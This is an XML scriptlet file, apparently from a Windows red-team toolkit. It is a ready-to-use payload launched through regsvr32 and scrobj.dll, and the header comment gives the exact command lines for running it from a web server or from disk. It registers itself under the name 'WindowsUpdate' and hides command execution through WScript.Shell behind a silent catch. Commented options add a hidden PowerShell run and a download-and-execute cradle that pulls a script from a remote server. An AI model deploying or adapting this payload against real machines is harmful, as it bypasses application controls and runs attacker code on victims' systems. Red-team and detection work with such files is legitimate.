<?xml version="1.0"?>
<!--
  SCT (Scriptlet) Command Execution Payload
  Native Windows Red Team Toolkit
  Author: Anubhav Gain (@anubhavg-icpl)

  USAGE:
  1. Modify the command below
  2. Host on web server OR use locally
  3. Execute:
     regsvr32.exe /s /n /u /i:http://your-server/command-exec.sct scrobj.dll
     OR
     regsvr32.exe /s /n /u /i:C:\path\to\command-exec.sct scrobj.dll
-->
<scriptlet>
  <registration
    description="WindowsUpdate"
    progid="WindowsUpdate"
    version="1.00"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}"
    remotable="true">
  </registration>

  <script language="JScript">
    <![CDATA[
      // CONFIGURE: Command to execute
      var command = "calc.exe";  // Change this to your payload

      try {
        var shell = new ActiveXObject("WScript.Shell");

        // Option 1: Simple command execution
        shell.Run(command, 0, false);

        // Option 2: PowerShell execution (uncomment to use)
        // var psCommand = 'powershell.exe -NoProfile -WindowStyle Hidden -Command "' + command + '"';
        // shell.Run(psCommand, 0, false);

        // Option 3: Download and execute (uncomment to use)
        // var downloadExec = 'powershell.exe -NoProfile -WindowStyle Hidden -Command "IEX (New-Object Net.WebClient).DownloadString(\'http://your-server/payload.ps1\')"';
        // shell.Run(downloadExec, 0, false);

      } catch(e) {
        // Silent fail
      }
    ]]>
  </script>
</scriptlet>
